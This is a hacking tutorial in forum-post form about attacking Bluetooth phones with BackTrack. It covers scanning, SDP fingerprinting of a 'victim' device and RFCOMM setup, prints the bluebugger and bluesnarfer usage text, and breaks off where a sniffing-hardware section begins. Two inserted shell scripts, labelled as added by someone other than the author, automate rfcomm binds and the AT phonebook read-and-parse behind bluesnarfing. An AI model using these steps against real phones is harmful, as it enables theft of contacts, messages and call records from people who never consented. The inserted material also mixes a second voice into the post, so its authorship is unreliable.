
Backtrack Ultimate Bluetooth Tutorial

Hey all,

After I received lots of mail and requests I decided to shed some more light on Bluetooth. In this tutorial I am going to be covering the following subjects:

1) Setting up your Bluetooth equipment
2) Scanning and fingerprinting devices
3) Connectivity and RFCOMM
4) Bluebugging & Bluesnarfing

And as a merry Christmas to all at Remote-Exploit:

5) Making Bluetooth sniffing hardware for $39.99

Video tutorials on different subjects will be added to this post over the next week.
OK, let's begin. The first subject might sound silly to most here, but for the guys that just don't know I'm going to cover it anyway. To set up your Bluetooth USB device, simply plug it in and wait about 10 seconds, then type in a console:
Code:
hciconfig hci0 up
And you should have your adapter up and working. You can test it with the following command:
Code:
hciconfig -a
And you should see something like the following .
Code:
hci0:   Type: USB
BD Address: 00:11:22:33:44:55 ACL MTU: 678:8 SCO MTU: 48:10
UP RUNNING
RX bytes:85 acl:0 sco:0 events:9 errors:0
TX bytes:33 acl:0 sco:0 commands:9 errors:0
Features: 0xbf 0xfe 0x8d 0x78 0x08 0x18 0x00 0x00
Packet type: DM1 DM3 DM5 DH1 DH3 DH5 HV1 HV2 HV3
Link policy:
Link mode: SLAVE ACCEPT
Name: 'ISSCBTA'
Class: 0x000000
Service Classes: Unspecified
Device Class: Miscellaneous,
HCI Ver: 1.2 (0x2) HCI Rev: 0x1fe LMP Ver: 1.2 (0x2) LMP Subver: 0x1fe
Manufacturer: Integrated System Solution Corp. (57)

OK, if you are stuck at this point I would suggest you go out and buy a USB dongle that is known to work with BackTrack. But if you are still with me, let's move on.
Next is fingerprinting a Bluetooth device. Fingerprinting is the term we use for profiling a device, and to do this BackTrack ships a collection of tools called BlueZ. BlueZ is the standard Bluetooth stack for Linux, and for fingerprinting we can use a couple of its tools. One is hcitool, which we use to scan for devices that are discoverable (i.e. answering inquiries). We scan with hcitool using the following command (the adapter is selected with -i before the subcommand):
Code:
hcitool -i hci0 scan
And you should see something like:
Code:
Scanning ...
        00:11:22:33:44:55       hackme

You can also brute-force scan for devices that are not discoverable (walking through address ranges instead of waiting for inquiry responses); BackTrack has you covered here too with a wonderful tool called btscanner. btscanner can also do inquiry scans, which is the mode you would use if you were wardriving.
The other is sdptool. sdptool browses a device's SDP (Service Discovery Protocol) records and tells us what services are available and on which RFCOMM channels they sit. We fingerprint a device with sdptool by issuing the following command:
Code:
sdptool browse victim_Mac
And you should see something like this:
Code:
Service Name: Serial Port
Service RecHandle: 0x10001
Service Class ID List:
"Serial Port" (0x1101)
Protocol Descriptor List:
"L2CAP" (0x0100)
"RFCOMM" (0x0003)
Channel: 2
Profile Descriptor List:
"Serial Port" (0x1101)
Version: 0x0100
Service Name: Dial-up Networking
Service RecHandle: 0x10002
Service Class ID List:
"Dialup Networking" (0x1103)
Protocol Descriptor List:
"L2CAP" (0x0100)
"RFCOMM" (0x0003)
Channel: 3
Profile Descriptor List:
"Dialup Networking" (0x1103)
Version: 0x0100
Service Name: OBEX File Transfer
Service RecHandle: 0x10007
Service Class ID List:
"OBEX File Transfer" (0x1106)
Protocol Descriptor List:
"L2CAP" (0x0100)
"RFCOMM" (0x0003)
Channel: 6
"OBEX" (0x0008)
Profile Descriptor List:
"OBEX File Transfer" (0x1106)
Version: 0x0100
Service Name: Object Push
Service RecHandle: 0x10008
Service Class ID List:
"OBEX Object Push" (0x1105)
Protocol Descriptor List:
"L2CAP" (0x0100)
"RFCOMM" (0x0003)
Channel: 7
"OBEX" (0x0008)
Profile Descriptor List:
"OBEX Object Push" (0x1105)
Version: 0x0100
Let's take a look at what we have: on channel 2 there is a serial port, on channel 3 dial-up networking (DUN), on channel 6 OBEX file transfer (FTP) and on channel 7 OBEX object push (OPUSH). All are interesting, and now we have a pretty good idea of what the device is and what it offers.
Now on to the bit most people I speak to struggle with: the dreaded RFCOMM. RFCOMM is a simple transport protocol layered on top of L2CAP that emulates RS-232 serial ports, or in layman's terms it provides the language your device and laptop need to talk to each other. Every service we saw above sits on its own RFCOMM channel, and that channel number is what we will be connecting to.
Now the first thing to do is set up our Bluetooth configuration, so let's go over to the /etc dir and get stuck in.
Open /etc/bluetooth/hcid.conf and replace the lot with this:
Code:
#
# HCI daemon configuration file.
#
# HCId options
options {
# Automatically initialize new devices
autoinit yes;
# Security Manager mode
# none - Security manager disabled
# auto - Use local PIN for incoming connections
# user - Always ask user for a PIN
#
security auto;
# Pairing mode
# none - Pairing disabled
# multi - Allow pairing with already paired devices
# once - Pair once and deny successive attempts

pairing multi;
# Default PIN code for incoming connections
passkey "1234";
}
# Default settings for HCI devices
device {
# Local device name
# %d - device id
# %h - host name
name "device1";
# Local device class
class 0x000000;
# Default packet type
#pkt_type DH1,DM1,HV1;
# Inquiry and Page scan
iscan enable; pscan enable;
# Default link mode
# none - no specific policy
# accept - always accept incoming connections
# master - become master on incoming connections,
#          deny role switch on outgoing connections
#
lm accept,master;
# Default link policy
# none    - no specific policy
# rswitch - allow role switch
# hold    - allow hold mode
# sniff   - allow sniff mode
# park    - allow park mode
lp rswitch,hold,sniff,park;
auth enable;
encrypt enable;
}
You can set your own passkey and name, and you should: with "security auto" and a well-known passkey like 1234, any device that guesses the PIN can pair with your laptop. Also go over to a shell and type
Code:
hciconfig -a
and copy the Class value into hcid.conf, then save and exit. You could set up your rfcomm binds in /etc/bluetooth/rfcomm.conf here too, but this is a live CD, so we will do it by hand below.
Now restart the Bluetooth service like so:
Code:
bash /etc/rc.d/rc.bluetooth restart
And now we can set up our rfcomm binds. I will post a bash script when I have time, but for now you will have to do it the manual way.
First thing is to create the device nodes:
Code:
mknod -m 666 /dev/rfcomm0 c 216 3
mknod -m 666 /dev/rfcomm1 c 216 6
mknod -m 666 /dev/rfcomm2 c 216 7
What we did there is create three RFCOMM character device nodes (major 216 is the RFCOMM TTY major). One thing to be clear on: the minor number picks which local rfcomm device the node refers to, it is not the remote channel, so /dev/rfcomm0 as created above is really rfcomm device 3. The remote channel is chosen when the device is bound or connected with the rfcomm tool. The plan is: RFCOMM0 for channel 3 (DUN, dial-up), RFCOMM1 for channel 6 (OBEX FTP) and RFCOMM2 for channel 7 (OBEX push).
Now let's register the matching services in our own dongle's SDP database with sdptool. This does not connect anything to the victim; it advertises DUN, FTP and OPUSH on the laptop so that a phone talking to us sees the services it expects:
Code:
sdptool add --channel=3 DUN
sdptool add --channel=6 FTP
sdptool add --channel=7 OPUSH
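This is the script the post above says is still to come; it is my own added example, not the author's, and it serves both the fingerprinting section and the rfcomm binds. It parses what `sdptool browse <bdaddr>` prints, lists which RFCOMM channel carries which service, and turns that into the `rfcomm bind` commands that map /dev/rfcommN to those channels. The SDP output embedded below is a constructed sample shaped like the one earlier in the post (with one extra unnamed record to show that case). It assumes /dev/rfcommN has minor number N, as udev creates them, so that `rfcomm bind N ...` and /dev/rfcommN refer to the same device.

```shell
#!/bin/sh
# Added example (not the author's promised script): parse `sdptool browse`
# output into a channel map and emit the `rfcomm bind` lines for it.
# SAMPLE_SDP is a constructed sample; real output is fed in the same way.
# Assumption: /dev/rfcommN has minor N (udev default).

SAMPLE_SDP=$(cat <<'EOF'
Service Name: Serial Port
Service RecHandle: 0x10001
Service Class ID List:
  "Serial Port" (0x1101)
Protocol Descriptor List:
  "L2CAP" (0x0100)
  "RFCOMM" (0x0003)
    Channel: 2
Profile Descriptor List:
  "Serial Port" (0x1101)
    Version: 0x0100

Service Name: Dial-up Networking
Service RecHandle: 0x10002
Service Class ID List:
  "Dialup Networking" (0x1103)
Protocol Descriptor List:
  "L2CAP" (0x0100)
  "RFCOMM" (0x0003)
    Channel: 3

Service Name: OBEX File Transfer
Service RecHandle: 0x10007
Service Class ID List:
  "OBEX File Transfer" (0x1106)
Protocol Descriptor List:
  "L2CAP" (0x0100)
  "RFCOMM" (0x0003)
    Channel: 6
  "OBEX" (0x0008)

Service Name: Object Push
Service RecHandle: 0x10008
Service Class ID List:
  "OBEX Object Push" (0x1105)
Protocol Descriptor List:
  "L2CAP" (0x0100)
  "RFCOMM" (0x0003)
    Channel: 7
  "OBEX" (0x0008)

Service RecHandle: 0x10009
Service Class ID List:
  "Headset Audio Gateway" (0x1112)
Protocol Descriptor List:
  "L2CAP" (0x0100)
  "RFCOMM" (0x0003)
    Channel: 8
EOF
)

# sdp_channels: print "channel<TAB>service name" for every record with an
# RFCOMM channel. Records without a Service Name line come out as
# "(unnamed)"; the name is reset on the blank line between records and
# after use, so a name cannot leak into the next record.
sdp_channels() {
    awk '
        BEGIN            { name = "(unnamed)" }
        /^$/             { name = "(unnamed)" }
        /^Service Name:/ { sub(/^Service Name: */, ""); name = $0 }
        /^ *Channel:/    { print $2 "\t" name; name = "(unnamed)" }
    '
}

# sdp_channel_for SERVICE: print the channel for an exact service name,
# exit 1 if the device does not advertise it.
sdp_channel_for() {
    sdp_channels | awk -F '\t' -v want="$1" \
        '$2 == want { print $1; found = 1 } END { exit !found }'
}

# rfcomm_bind_plan BDADDR: one `rfcomm bind` line per channel, numbering the
# local rfcomm devices from 0. Printed rather than executed: binding needs
# root and a live adapter, so review the plan and pipe it into sh when ready.
rfcomm_bind_plan() {
    sdp_channels | awk -F '\t' -v addr="$1" \
        '{ printf "rfcomm bind %d %s %s  # %s\n", NR - 1, addr, $1, $2 }'
}

# Demo on the constructed sample. Against a real target:
#   sdptool browse 00:11:22:33:44:55 | rfcomm_bind_plan 00:11:22:33:44:55
printf '%s\n' "$SAMPLE_SDP" | rfcomm_bind_plan 00:11:22:33:44:55
```

Once a bind is in place, opening /dev/rfcommN makes the connection to that channel on demand, and `rfcomm release N` undoes it.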
Now that we have set up our Bluetooth dongle correctly we can begin hacking.
If I were to talk you through every possible exploit there is for Bluetooth it would take all next year and I still wouldn't be finished, so the two hacks I am going to cover are bluesnarfer and bluebugger.
The original Bluesnarf attack connects to a target device via the OBEX Push profile, but instead of pushing a business card it pulls, using an OBEX GET request for files with known names such as the phonebook (telecom/pb.vcf) or the calendar (telecom/cal.vcs). The bluesnarfer and bluebugger tools shown below take the related route of opening an RFCOMM channel to the phone and issuing GSM AT commands (their usage text gives '+GMI' as an example) to read phone info, the phonebook and messages. Bluebugging works in a similar way.
Also bear in mind that these security flaws can still be used against you. With a little bit of social engineering you could pre-pair a phone to your laptop and exploit it from then onwards. Stand by for a video of bluesnarfer and bluebugger successfully completing a hack on my Samsung D600.
Both are pretty straightforward to use now that you have your Bluetooth set up correctly. I'm not going to post commands because there is a video on the way. First bluebugger:
Code:
bluebugger 0.1 ( MaJoMu | www.codito.de )
----------------------------------------
Usage: bluebugger [OPTIONS] -a <addr> [MODE]
  -a <addr>     = Bluetooth address of target

Options:
--------
  -m <name>     = Name to use when connecting (default: '')
  -d <device>   = Device to use (default: '/dev/rfcomm')
  -c <channel>  = Channel to use (default: 17)
  -n            = No device name lookup
  -t <timeout>  = Timeout in seconds for name lookup (default: 5)
  -o <file>     = Write output to <file>

Mode:
-----
  info          = Read Phone Info (default)
  phonebook     = Read Phonebook (default)
  messages      = Read SMS Messages (default)
  dial <num>    = Dial number
  ATCMD         = Custom Command (e.g. '+GMI')

Note: Modes can be combined, e.g. 'info phonebook +GMI'


And bluesnarfer:
Code:
bluesnarfer, version 0.1
usage: bluesnarfer [options] [ATCMD] -b bt_addr
ATCMD     : valid AT+CMD (GSM EXTENSION)
TYPE      : valid phonebook type ..
example   : "DC" (dialed call list)
            "SM" (SIM phonebook)
            "RC" (received call list)
            "XX" much more
-b bdaddr : bluetooth device address
-C chan   : bluetooth rfcomm channel
-c ATCMD  : custom action
-r N-M    : read phonebook entry N to M
-w N-M    : delete phonebook entry N to M
-f name   : search "name" in phonebook address
-s TYPE   : select phonebook memory storage
-l        : list available phonebook memory storage
-i        : device info
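To show what a phonebook read looks like under the hood, here is an added example of mine (not from the post or from the bluesnarfer author). bluesnarfer's -s, -r and -l options correspond to the standard GSM AT phonebook commands (3GPP TS 27.007): AT+CPBS selects the storage ("SM", "DC", "RC" ...), AT+CPBR=N,M reads entries N to M, and the phone answers with +CPBR: index,"number",type,"name" lines followed by OK, or ERROR / +CME ERROR when, for example, no storage is selected. The functions build that command sequence and parse the reply, including the error case. The phone response embedded below is a constructed sample; on a real target it would come back over the bound /dev/rfcommN device.

```shell
#!/bin/sh
# Added example (not from the original post): the AT exchange behind a
# phonebook read, with the reply parsed into index|number|name.
# SAMPLE_AT_RESPONSE is a constructed reply, not a capture from a phone.

# at_phonebook_cmds STORAGE FIRST LAST: the command sequence to send, one
# per line. Each must be terminated with CR on the wire; that is what the
# phone's AT parser expects.
at_phonebook_cmds() {
    printf 'AT+CPBS="%s"\n' "$1"
    printf 'AT+CPBR=%s,%s\n' "$2" "$3"
}

SAMPLE_AT_RESPONSE=$(cat <<'EOF'
AT+CPBR=1,3
+CPBR: 1,"+441234567890",145,"Alice"
+CPBR: 2,"01234567890",129,"Bob, Work"
+CPBR: 3,"*#06#",129,"IMEI code"
OK
EOF
)

# at_ok: exit 0 only if the final result code of the reply is OK. CRs are
# stripped first because a real serial reply ends every line with CRLF.
at_ok() {
    tr -d '\r' | awk '
        BEGIN { rc = 1 }
        /^OK$/ { rc = 0 }
        /^ERROR$/ || /^[+]CM[ES] ERROR/ { rc = 1 }
        END { exit rc }
    '
}

# cpbr_parse: turn +CPBR lines into "index|number|name". The name is matched
# greedily up to the closing quote so a comma inside it ("Bob, Work") is
# kept; the command echo and the result code are ignored.
cpbr_parse() {
    tr -d '\r' | sed -n 's/^+CPBR: \([0-9][0-9]*\),"\([^"]*\)",[0-9][0-9]*,"\(.*\)"$/\1|\2|\3/p'
}

# Demo on the constructed sample. Against a phone you would send the output
# of at_phonebook_cmds through the rfcomm device (or simply run
# bluesnarfer -b <addr> -s SM -r 1-3) and pipe the reply into cpbr_parse.
if printf '%s\n' "$SAMPLE_AT_RESPONSE" | at_ok; then
    printf '%s\n' "$SAMPLE_AT_RESPONSE" | cpbr_parse
else
    echo "phone returned an error; select a storage with AT+CPBS first" >&2
fi
```

The type field (145 for international numbers with a leading +, 129 otherwise) is dropped in the parsed output; keep it if you need to tell the two apart.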

Now for the finale: how to turn an ordinary USB Bluetooth dongle into a $1000 sniffing tool.
